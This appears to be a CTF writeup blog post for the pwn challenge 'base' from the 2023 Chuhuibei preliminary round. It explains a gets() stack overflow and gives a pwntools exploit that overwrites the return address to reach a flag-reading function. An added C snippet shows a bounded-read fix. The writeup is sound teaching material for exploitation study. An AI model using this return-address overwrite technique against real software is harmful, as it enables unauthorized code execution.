Inf0 - Pwn
https://dirtycow.cn/category/Pwn/
-
2023楚慧杯初赛pwn部分WriteUp
https://dirtycow.cn/187.html
2023-12-19T20:22:00+08:00
base

Approach: checksec shows the binary has NX enabled. Open it in IDA for a quick look: at line 49 the program calls gets() to read user input into input, and input is only 0x20 bytes. Shift+F12 to list the strings turns up flag.txt; following the reference leads to what looks like the function that reads the flag, at address 0x40490D.

Now build the payload. Since this is a 64-bit program, 8 bytes are needed to cover the saved rbp before the return address:

payload = b'A'*0x20 + b'B'*8 + p64(0x40490D+1)

exp:

from pwn import *

p = process('./base')
# 0x20 bytes fill input, 8 bytes cover the saved rbp, then the flag function
payload = b"A" * 0x20 + b"B" * 8 + p64(0x40490D+1)
p.sendline(b'1')
p.sendline(payload)
p.interactive()
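The root cause above is gets() writing past a 0x20-byte input buffer. As an added illustration (not code from the writeup or the challenge binary), here is a bounded reader that keeps the same 0x20 buffer but cannot overflow it, exercised on a constructed over-long line; the reader and demo function names are assumptions, and tmpfile() stands in for stdin.

```c
#include <stdio.h>
#include <string.h>

#define INPUT_SIZE 0x20   /* same size as the writeup's input buffer */

/* Bounded replacement for gets(): reads one line into buf (capacity cap),
 * strips the newline, and drains any excess so the next read starts on the
 * next line. Returns bytes stored, or -1 on EOF before any data.
 * *truncated is set to 1 when the line did not fit. */
long read_line_bounded(FILE *in, char *buf, size_t cap, int *truncated)
{
    *truncated = 0;
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';              /* complete line: drop the newline */
    } else {
        int c = fgetc(in);              /* peek: more data on this line? */
        if (c != EOF && c != '\n') {
            *truncated = 1;             /* yes: gets() would have overflowed */
            while ((c = fgetc(in)) != EOF && c != '\n')
                ;                       /* discard the rest of the line */
        }
    }
    return (long)len;
}

/* Constructed sample: a 0x28-byte filler line (the writeup's 0x20 + 8 bytes)
 * followed by a normal one-character line. Returns 1 if the long line was
 * cut to fit the buffer and the next line still read intact, else 0. */
int demo_overlong_then_normal(void)
{
    char sample[64];
    memset(sample, 'A', 0x28);
    memcpy(sample + 0x28, "\n2\n", 4);  /* includes the terminating NUL */
    FILE *in = tmpfile();
    if (in == NULL) return 0;
    fputs(sample, in);
    rewind(in);
    char input[INPUT_SIZE];
    int truncated = 0;
    long n = read_line_bounded(in, input, sizeof input, &truncated);
    int ok = (n == INPUT_SIZE - 1) && truncated;
    n = read_line_bounded(in, input, sizeof input, &truncated);
    ok = ok && n == 1 && !truncated && strcmp(input, "2") == 0;
    fclose(in);
    return ok;
}
```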